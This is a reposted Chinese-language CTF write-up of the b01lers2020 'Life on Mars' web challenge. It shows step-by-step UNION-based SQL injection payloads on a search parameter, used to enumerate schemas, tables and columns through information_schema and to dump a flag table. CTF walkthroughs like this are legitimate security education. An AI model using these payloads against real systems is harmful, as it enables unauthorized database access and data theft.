[b01lers2020]Life on Mars

Posted F1gh4

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[b01lers2020]Life on Mars相关的知识,希望对你有一定的参考价值。



界面如下,点击可以看到各种信息,讲的是火星上的事物:
扫描一遍,没有发现任何东西:
并没有备份文件,猜测可能是一些框架的注入之类的,
在各页面抓包查看是否有可疑传参:


某一个页面,看到有类似查询的参数:

传参的数据如果是地名,则显示json形式的页面信息,尝试注入:
通过这个形式显示,信息:

尝试:

/query?search=amazonis_planitia union select version(),database()


将表名聚合在一起:爆出表名
对了,下面这是最常见的对没有过滤的sql注入进行查找的典型payload,用group_concat把某一信息聚合在一起,同时是从information_schema中查找,其是mysql自带的记录数据库元组字符规则的数据库,带有各种信息:

可以找到用户自己定义的表:

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

查表:

看不出什么,还是先爆其他的吧:

/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata

还是直接上代码爆出库名,和之前多出了两个库:

有个alien_code,可以看看;

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'


只有一个表叫’code’
继续查询表中字段:

/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'


有code和id两个字段,直接去code里面找:

/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code

找到flag:

以上是关于[b01lers2020]Life on Mars的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF-[b01lers2020]Life on Mars

BUUCTF-[b01lers2020]Life on Mars

[b01lers2020]Life on Mars

[b01lers2020]Life on Mars

[b01lers2020]Welcome to Earth

[b01lers2020]Welcome to Earth